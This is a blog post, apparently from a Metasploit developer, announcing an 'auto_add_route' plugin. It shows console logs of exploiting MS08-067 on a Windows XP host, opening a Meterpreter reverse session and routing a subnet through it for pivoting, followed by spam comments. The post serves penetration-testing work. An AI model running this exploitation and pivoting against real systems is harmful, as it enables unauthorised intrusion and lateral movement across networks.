[*] Meterpreter session 1 opened (10.1.1.1:4444 -> 10.1.1.128:1238)
meterpreter > run get_local_subnets
Local subnet: 10.1.1.0/255.255.255.0
meterpreter > background
msf exploit(ms08_067_netapi) > route add 10.1.1.0 255.255.255.0 1
msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.1.1.0 255.255.255.0 Session 1
msf exploit(ms08_067_netapi) >
After running the above commands any traffic sent to addresses in the 10.1.1.0 network will be tunnelled through the session. As part of my Blackhat DC presentation last week, I demo'd a plugin that automatically adds a route for any previously-unseen subnets when a new session opens up. Here is some example usage and output:
msf exploit(ms08_067_netapi) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.1.1.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.1.1.1:4444 -> 10.1.1.128:1239)
[*] AutoAddRoute: Routing new subnet 10.1.1.0/255.255.255.0 through session 1
meterpreter > background
msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.1.1.0 255.255.255.0 Session 1
msf exploit(ms08_067_netapi) >
The auto_add_route plugin is now available in the metasploit trunk; 'svn up' to get it.
5 comments:
Awesome.
Nice blog you got here. It would be great to read more concerning that theme. The only thing it would also be great to see here is some photos of any gadgets.
Nickolas Trider
Cell jammer
Hi! Thanks for a great site Payas..
Very, very nice site thank you
thanks
Post a Comment